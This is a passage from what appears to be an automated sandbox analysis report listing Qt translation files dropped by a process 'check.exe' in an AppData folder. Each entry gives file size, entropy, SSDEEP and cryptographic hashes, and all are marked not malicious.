                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):117
                                                                                                                                                                                                                                      Entropy (8bit):3.739162292019161
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/4HlAlHekRgOp1MUZWJKlI+rwtbWlMsIkk:Cwxe++IUocIRt6Qkk
                                                                                                                                                                                                                                      MD5:72882942B07B8AAC98034016E752B1A0
                                                                                                                                                                                                                                      SHA1:BF23B4C136B863B10E770019A2DF62FC988859DF
                                                                                                                                                                                                                                      SHA-256:048CA42DCE4FAF5FC21D843576E3C6FD963146ECC78554E7E5F34D07F64FB213
                                                                                                                                                                                                                                      SHA-512:403E7F4E9A0E44F2118804F0781A18EB1852797825498751E3AFA02D9558D90293ABDB570786CED80F7EFF800BEF6D9444A72E6A640D331DA46B2A0EA43C8E96
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......fi....R.....q.t.b.a.s.e._.f.i.....q.t.s.c.r.i.p.t._.f.i.....q.t.m.u.l.t.i.m.e.d.i.a._.f.i.......
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.680458675741643
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/FjlAlHekRL21MUZNJOLlI+rwtbWlMs9KIPldkORT:Cw3+SU0RIRt6koio
                                                                                                                                                                                                                                      MD5:3C45C665CFE036A7474CB4DCBB13CF40
                                                                                                                                                                                                                                      SHA1:62312DFF3C4CD38BAE8456C981601D0D89600F63
                                                                                                                                                                                                                                      SHA-256:8624033D849E670B12C9532337FCBF260F20848E044FEE7787CFE2AC92BE28DB
                                                                                                                                                                                                                                      SHA-512:21659AA452BC2493D915F0BE94F90CDD57759B1F1306AAA2836058D41E80DED24742EBD74E19420021514A6AB4150CA0B447574E96B9D3BF0BC5A8C78DAAF7AC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......fr....v.....q.t.b.a.s.e._.f.r.....q.t.s.c.r.i.p.t._.f.r.....q.t.m.u.l.t.i.m.e.d.i.a._.f.r... .q.t.x.m.l.p.a.t.t.e.r.n.s._.f.r.......
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):70
                                                                                                                                                                                                                                      Entropy (8bit):4.463523104731333
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/EXlAlHekQrEuknbJB:CwjO+5JY
                                                                                                                                                                                                                                      MD5:A8D55457C0413893F746D40B637F9C93
                                                                                                                                                                                                                                      SHA1:25123615482947772176E055E4A74043B2FBCAA0
                                                                                                                                                                                                                                      SHA-256:49DF855A004A17950338AF3146466F6DF4D5852410BD0B58EA80E0D0203A9D24
                                                                                                                                                                                                                                      SHA-512:99718B948D94B292BDEDF6B247A5856BC7AC78408FCC41C980F264C2C8565125786F0289F5F993DCF11B8CDA3AFB2A1D8634B1D0BC9B34992F538F8E4086EC00
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......gd..........q.t.b.a.s.e._.g.d....................
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):323590
                                                                                                                                                                                                                                      Entropy (8bit):4.568068046062524
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:OYSG8zxWSDjq73Pf6FT1f4uh50QGrRfFD54YyUY0Ou4/tnra3Z0uYhB5YHfHRRn2:O39WSD3TMQGrxFD5EUVQ
                                                                                                                                                                                                                                      MD5:0661FFABFBC50187F3BA38876B721946
                                                                                                                                                                                                                                      SHA1:EB5E7205355CFC6BCB4DF27E224079842C97B296
                                                                                                                                                                                                                                      SHA-256:204A01AC7DEB6B5BAE193AFECBD1E50D18C73BF7D94BADEB2BBFDF6123C4ED93
                                                                                                                                                                                                                                      SHA-512:65AB66CC54D65E7678FA731A5C5F2CC9D6FC217B91AD47D538440811E09A23E49CD95CE62A79E3E8C275E250AC1A0B54BD289F6DD067573876DA7AFF54381D02
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):83
                                                                                                                                                                                                                                      Entropy (8bit):3.880645689209568
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/YJ/dQlHekfaB21MUXmlvt:CwT0+D/UUt
                                                                                                                                                                                                                                      MD5:DD5C2C6B148F2DB3E666B859776AE129
                                                                                                                                                                                                                                      SHA1:8368F32039CC0776A1B95C9DED5FE6C9EA0D93FD
                                                                                                                                                                                                                                      SHA-256:C113D14E218D5402B616DABEA27969C6F83852676468C5EF051DDDEFB3EE0235
                                                                                                                                                                                                                                      SHA-512:2EAE33C8707407E083F6B8B05EA2C5B987646DF1553888C16D6508C5A33B2F758DDED73323622CD50324C96F51D61B7CE822F393551A30B211ABD3CC1367249F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......he....0.....q.t.b.a.s.e._.h.e.....q.t.s.c.r.i.p.t._.h.e.......
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):8743
                                                                                                                                                                                                                                      Entropy (8bit):5.189558605179696
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:YUM7gBwnG4Vxj4nyn9aAMOJckrL6esm/0sQ5HeK1nvEB:YBkKnZxkyn9aAMWPsm/0sQsGvEB
                                                                                                                                                                                                                                      MD5:CCD39A7C8139AD041E31B3E5D40968B4
                                                                                                                                                                                                                                      SHA1:5751BE96817BB6AE7C9DA9F1FBA7F42F31CFCC5D
                                                                                                                                                                                                                                      SHA-256:222088C9752D1CC3BAB985EF2DC77E5AE78578DCE18A61EC15B39F02E588163D
                                                                                                                                                                                                                                      SHA-512:9844C0EC65EE1C76DBA021EAC6D476A85E6C8F5BBAF4150C1EA80C0A95BEDE67B5E8F981360EF8599FCECDFCBCB83BC0B8AC44DDEFDCD85F914318030E346967
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10599
                                                                                                                                                                                                                                      Entropy (8bit):5.192287379770591
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:jhYkcd7CYBdmfIOeX3byuJRoZXlBYnEpUYR+BJqO5X9pA2NNrxC0zwRK2nMY762A:a71DQIrLuVCnEtR+DquhN5xC0zwKPYHA
                                                                                                                                                                                                                                      MD5:5538049DA3A1D1D724AB6E11D2E2EDBE
                                                                                                                                                                                                                                      SHA1:7256BE390B88A053C0252488C443BE42F6F2D92A
                                                                                                                                                                                                                                      SHA-256:CBCDD1E0BBAE332D80DDB0A286056F17C824FA28D353D7FDF12FC97D9F6FE054
                                                                                                                                                                                                                                      SHA-512:DD98CAF3A016968EEDC9106C1839DDECC2D109E9E354708BD74B35E766C6A098C1680C0B867EAD9FCE2E2A6D683BE673B8E5DF1A1B2F1AAFDB31910FF833370F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):7444
                                                                                                                                                                                                                                      Entropy (8bit):4.580794980254807
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:G8oS34B7n303D37Bn3Jso37cfp3Mg3H373R58noct36R9RFu:GQU7ETrxZvqTXLSoct36Pzu
                                                                                                                                                                                                                                      MD5:66722ED97BCBFD3DAE3C8264413859AB
                                                                                                                                                                                                                                      SHA1:400A93B213FCF9BBC9785881EA82ADB9F444CD6C
                                                                                                                                                                                                                                      SHA-256:ECD4283A660F2CF72849B323810D7EADD063120B6F561E05AA1243A5B280946A
                                                                                                                                                                                                                                      SHA-512:B898BAC9652D7532384ED5CC53FA62DB55D516421D13F815A3E6D5E80AD4C69555F1A7E6C51F8B0A234614824EEE01D6731458F90D40A585990F84A58B9ABE44
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):15297
                                                                                                                                                                                                                                      Entropy (8bit):4.708378368926237
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:hmv1gdEYEiNrVhTBvAn1ca1f5lwHoJr0vwuxqsP/5jxA:o1gdEvgbloCof9ixqspW
                                                                                                                                                                                                                                      MD5:ED228F0F60AE9AEC28AB9171D5AE9590
                                                                                                                                                                                                                                      SHA1:7F061CF0C699D125A5531E3480C21964452F45EA
                                                                                                                                                                                                                                      SHA-256:4AC56FC63E400943BAB13F1D4C418502138908E1D488C24AEE6131D3D17552AA
                                                                                                                                                                                                                                      SHA-512:794CC671C08BFC50980820A6389B9D0D3514619AD0A8F18EFD5554CBBF2482192DF00B9D3B05FEE45F42276E63E2375FB28E193930D426245035B4B0E3E14ED8
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4795
                                                                                                                                                                                                                                      Entropy (8bit):4.530246422531362
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:X82wNlnKfN1LMFy7LsF3ZqBFZjWo0koBLqBXXjGL0qU7UqB7zoElmP5MUu4DZIHU:XM01f7eOnoB8X2s7Vfg5Mi4beXiOUu
                                                                                                                                                                                                                                      MD5:1D09BEE1FB55A173F7EB39B9A662A170
                                                                                                                                                                                                                                      SHA1:C77F0A148262A91679F19689E4790B754D45D5D5
                                                                                                                                                                                                                                      SHA-256:6BB092552A398687119F6D52145F04BF8373977446D8F00C0DCBD56B96829F0F
                                                                                                                                                                                                                                      SHA-512:BE5A31A6135E8DB024A8B0EB20C4D8EECBF76861F83FF83B4CA97327DB74AD94BB5D77B4E0A59A33B697C32A4EACD61B8C878951F2C545385C74D99FCE56FEE1
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):7570
                                                                                                                                                                                                                                      Entropy (8bit):4.550982634910665
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:8y/gPmmhL/7LlSivP6kBL7jb0RNUzzpld4UGG3Ik18fLP0L7fGc0OeVP8a8hiAwj:1OD7hx/Bv3oNuFX4iqgv34fZsu
                                                                                                                                                                                                                                      MD5:3B070D169E3381E2FB081172934AAD00
                                                                                                                                                                                                                                      SHA1:70886EB7EF566B296D0814BD4C2440AC176699D6
                                                                                                                                                                                                                                      SHA-256:9962523FBAE9F1E4C3B5C3C16860D059291CB30DC5EBE5A5EDA4C836A03FED1E
                                                                                                                                                                                                                                      SHA-512:271B730B5A7358E923BBBC6FA074A72DA52FA47E3B7726779EF7034200EDA09BF0E1AE4E7B11B59F76805F48DC285F6EFC245EB9C7F4A748BE82B25CEE1DDCAE
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                      Entropy (8bit):4.0
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4n:CwZ
                                                                                                                                                                                                                                      MD5:BCEBCF42735C6849BDECBB77451021DD
                                                                                                                                                                                                                                      SHA1:4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
                                                                                                                                                                                                                                      SHA-256:9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
                                                                                                                                                                                                                                      SHA-512:F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10704
                                                                                                                                                                                                                                      Entropy (8bit):4.481291573289571
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:q9J9j7e4BQhD0h61nnKz+DJF/45ojDU9V1Wa/rmtIBMH:Wp64ShDnnKz+FhjQpWa/ytoMH
                                                                                                                                                                                                                                      MD5:9EDF433AB9EE5FC7CF7782370150B26A
                                                                                                                                                                                                                                      SHA1:A918AE15A0DF187C7789BE8599A80E279F039964
                                                                                                                                                                                                                                      SHA-256:FD16B279F8CF69077F75E94D90C9C07A2AFFF3948A579E3789F5FFB5E5F4202D
                                                                                                                                                                                                                                      SHA-512:88245F6FBAAF603A03D7EA2341411AE040791D47C9FF110C6D6CDD8165F0A8BA7A4A0DA5CD543BBE95A4E93FE3A81E95B3664E00C11791FBCB4923E3A80ABC60
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10922
                                                                                                                                                                                                                                      Entropy (8bit):4.459946393010639
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:w4BIn67/WsmoB3r6M/eYlSbyE7DnvE7pcn9nPJZe7nOFovzcNn7Uhmio+2/p53I/:w4N19fq3n2c9Bucuhmi52/X3Qpam
                                                                                                                                                                                                                                      MD5:D520C7F85CC06C66715A2B6622BF0687
                                                                                                                                                                                                                                      SHA1:47292D068172FBC9DC0D9BE2F479E890A37CE138
                                                                                                                                                                                                                                      SHA-256:687E351C062F688AAFF6CF05218D6017B80B1A1B4238D1D30250A55EE41C5FED
                                                                                                                                                                                                                                      SHA-512:736B50BB64751B127300BCAFE88888A9D9A2081CBF934EDCFFEF6CEF0575505AFDF714273A97671ABB598AE3D23C8E55F7DCD632FB0AA219ED5F763768576E04
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10891
                                                                                                                                                                                                                                      Entropy (8bit):4.5087667371046205
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:Im7gBZHx4hCTNarW6EJDvoIR765f40wqNcMi/8F/Ihon:v0fHccarW6Eh61wqNcMi/Q/won
                                                                                                                                                                                                                                      MD5:B62C74793741FC386332A59113E8D412
                                                                                                                                                                                                                                      SHA1:589CE099F2C1D92581B5CF0E17BE49A2BF0014D4
                                                                                                                                                                                                                                      SHA-256:7399A248609974773F60866C87B78EA7DFBC4F750313D692F7886CD763883C9F
                                                                                                                                                                                                                                      SHA-512:D8E1A3B3732662BA572A1387651F2625742710834BEDB41809DA47B5D23020AA1B558B64A00C10C605D1844F0544483163F4A6227CAFFA5ECDABF3BBF4E12D9B
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10284
                                                                                                                                                                                                                                      Entropy (8bit):4.674501432335502
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:RNY+rCG3e7LBqYqYseBb/FEWBgSn62TdJgDO9esYGY3DtgGh621XlZ/8kWvIMK:4+rheHYYZdBb/pgSn62T/FeVD3DGGh62
                                                                                                                                                                                                                                      MD5:5A56E9E2ED6ECE3F249D1C2A7EB3B172
                                                                                                                                                                                                                                      SHA1:D6F079F40FBB813B0293C1D2210BAE7084092FEC
                                                                                                                                                                                                                                      SHA-256:70F33B569C2942F41C6D634EA6A61CB8D80EB2C7011BAD48EF6DBAE9677960D5
                                                                                                                                                                                                                                      SHA-512:28947128FC51791CFDBFD3958FAF9B33979DB52C90AE0159EDB01FE6032284EB37BC05187162983A0435560BCEA864B008F499CDB4CE662792599FE20A37972A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10612
                                                                                                                                                                                                                                      Entropy (8bit):4.458970627057882
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:nRxcfy71b+myBN16cbc+w45rtlTnzo7uHp3JQJ9cVu4BJ1G82g33vOVrNL/7nEF1:RR4R/fJn9JizTgnqrNL/b0hH2K
                                                                                                                                                                                                                                      MD5:3639B57B463987F6DB07629253ACD8BF
                                                                                                                                                                                                                                      SHA1:65935A67C73F19FCF6023FB95030A5ACAF9DA21C
                                                                                                                                                                                                                                      SHA-256:316FE8D0815E2B4B396895BEB38EF1A40431915B5E054DF80F4C0CD556F26E4B
                                                                                                                                                                                                                                      SHA-512:AD7CA93D93A69F273CE80BE7F2F477543B9C5F9C7E4D7448223BFF084EA956B626D6837F22D83C5E282688B938F58C29073C4B5C6F26A797F716C14FABF9FFEE
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):7917
                                                                                                                                                                                                                                      Entropy (8bit):5.680408580146589
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:mP6J37GcBzRjYEPEJJGTnwfJJxb7FTPjzzZBL3/q/I53:mSVqclR5s6Tnwfb7Pj/PL3/q/w3
                                                                                                                                                                                                                                      MD5:1380A9352C476071BDA5A5D4FED0B6C5
                                                                                                                                                                                                                                      SHA1:9B737ED05F80FE5D3CD8F588CCEC16BB11DD3560
                                                                                                                                                                                                                                      SHA-256:AE603B2C0D434D40CDE433FFCBA65F9EE27978A9E19316007BE7FE782A5B8B47
                                                                                                                                                                                                                                      SHA-512:EC3D68126488C3A163898BACAF7E783217868573635182CAF511ED046B4BE1F99A71FBB24DA607CCB50EDAF70893007AAEE9A6BAAE4C1CD33465A0915AA965DA
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):5708
                                                                                                                                                                                                                                      Entropy (8bit):5.698914195742074
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:elPQHJ6L4c7LaQaFQv2QEhBL+Ejma0W40U0BzlQlcrnUSaTIdspIc18CLRSM3LBY:dHI97W1BbNz1VqqzJpoj5y5uY7OGrWFE
                                                                                                                                                                                                                                      MD5:CD15674A652C2BF435F7578E119182F8
                                                                                                                                                                                                                                      SHA1:AEA22E4A0D21396733802C7AB738DDD03737B7D6
                                                                                                                                                                                                                                      SHA-256:F11C64694E8E34E1D2C46C1A1D15D6BA9F2DB7B61DE4FDF54ECA5AB977C3E052
                                                                                                                                                                                                                                      SHA-512:88BFA112F4DBC0BFB4013CE0937E5180B4AB4A217FC8A963798C7C86532E794E4A1AD88416AE42F26A1C0631B465A5D69BFE75366E048502F5E21F4115A12F19
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):9673
                                                                                                                                                                                                                                      Entropy (8bit):4.622652249027856
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:TO/7kBL9wGu3wtCnlhLJUBB7oph+mZ18LgP:T8QnwcCnlhdvphpZ18LgP
                                                                                                                                                                                                                                      MD5:2B68446B69D9AA40B273D75A581D2992
                                                                                                                                                                                                                                      SHA1:8A09BD38998543B74E2673478EDD54FB4BBDD068
                                                                                                                                                                                                                                      SHA-256:CC6CB4D8C54086224672F2E49E623C8CB7C0C1CD65B8D5ECD42FC9BA3A6065BD
                                                                                                                                                                                                                                      SHA-512:F3A3D6A416B3411613B06FC3EE56625D4D4DE80087182AB0D0601E49314861ABEF97D11A15B4C0511911544A59FBC4A4A52F0CCF0FD43F763A76A8922D8E57B6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):7288
                                                                                                                                                                                                                                      Entropy (8bit):5.297177914619657
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:dBJjvfq7D6X68uBAzlp5W9+yBPZZZMM7vL0PXJL:JKrMEL0PXJL
                                                                                                                                                                                                                                      MD5:794AF445A5D7082D51BD22683449F86D
                                                                                                                                                                                                                                      SHA1:3A0C369872B112A1572AA17EEB814B168B225D98
                                                                                                                                                                                                                                      SHA-256:557B644E6DA5F1EC720EF93965617087E4D1F40B2494CC5AA524CF3796108DE7
                                                                                                                                                                                                                                      SHA-512:D42C870A16AEE7626BBE24886AD423895529A2F1A51AC2DBC303BC0E4EF9D3241FE894ECA3F7217AD408C8DCEE165CA4B89D84570357B0EB80340A3F72B0A846
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10388
                                                                                                                                                                                                                                      Entropy (8bit):4.70568613551943
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:uPq7iBWseXKkVu4+Qv9zEJ1xGMaLNmBgJqdC6/MxIMt:LWcseV04Xv9zEoLNDJqdX/MxRt
                                                                                                                                                                                                                                      MD5:75C94E59F1FC5312AE25381C247AF992
                                                                                                                                                                                                                                      SHA1:E3E5F4582CC5FAFE6DF43644D11484861023C084
                                                                                                                                                                                                                                      SHA-256:F41E33E1D790BD0D3EB180F1F875BC191FE74773628F25C2CAD95E1402E66867
                                                                                                                                                                                                                                      SHA-512:959B8F4D57FC9728DD4804322333D1792D45A0EE85615B559E0CA3BD2DEA22E2C8C68C6482AE9425D29C819B0ED27473EDDC82EF4B6ECFFB2E2E7B56E1509B63
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10363
                                                                                                                                                                                                                                      Entropy (8bit):4.613473842638716
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:vNBqTi7qBCVIQf54EslZ2Jy/L/BnmpP0bX3caK6q1B6/hgIlCCUb0:vjq2+UVT4ESZOYmpP0bX26q1I/yqCCUw
                                                                                                                                                                                                                                      MD5:3B0AEE27B193A8A563C5CB5C7C4FE60F
                                                                                                                                                                                                                                      SHA1:C94E832595EC765370553468F87C02DB7E7D138A
                                                                                                                                                                                                                                      SHA-256:2EC955E662407EBCD8DCDAE5AAA21E4108E0B5B0AEE0E9DB712C27072943535F
                                                                                                                                                                                                                                      SHA-512:EBC25C378126876F44279E23CA0CF06FC9E7D5F51AD7E3DBDABA7A50C81112EDC1C76F7FD0AF47E447A93C3593BB953A0C9C1FBBFC49494E6B29BF21655F690E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4629
                                                                                                                                                                                                                                      Entropy (8bit):4.68793836539357
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:BoiK0UD2wMLb7Lqlguotqbww5BLNwWjK0kHU9zuQlUVUfniqthweEIFwC18lLEGA:PXFf7pU75BWWOpcJcVqDFNz8brgyf76r
                                                                                                                                                                                                                                      MD5:32D6EE3D8EE6408A03E568B972F93BCB
                                                                                                                                                                                                                                      SHA1:582EE079DBD42000C378E0701D26405750524DBA
                                                                                                                                                                                                                                      SHA-256:EBDECA0CFEE7A9441DEB800BABFD97C63BC4E421DA885C55B3BD49725EBACD25
                                                                                                                                                                                                                                      SHA-512:24AAA30B9CB4DB82A57411FBA24A87D70D8B845AE48A6FDA633D0BE6B824B58FDD2F450C2B385F16F49E2F9C6FA0A3124FD0F28594726940F996C66F8F3216CC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):9750
                                                                                                                                                                                                                                      Entropy (8bit):5.281035122342072
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:eMp79BCN+u8hhbHbny+HJouHgei50JBSfDvbetpP/RIkT:eIhgNgBbny+phiS3SfDDetpP/RRT
                                                                                                                                                                                                                                      MD5:90A776917D534B65942063C319573CDC
                                                                                                                                                                                                                                      SHA1:5DF3B213D985A3BBDB476B37B7780D7D7DF17E41
                                                                                                                                                                                                                                      SHA-256:497CFC473684692EE44D7A3795E8FB2270C57069FD9EB98A615DD29AB9BE8A7C
                                                                                                                                                                                                                                      SHA-512:B34A019716B50CE8E1E20AC32756B3B0D5802971F7A04F4BDDE2418DA551AFB9742B79E934979DB6FAB9DAC05D7D26A3B19ABA77158321F8D9AAB08AEBBD455A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):6441
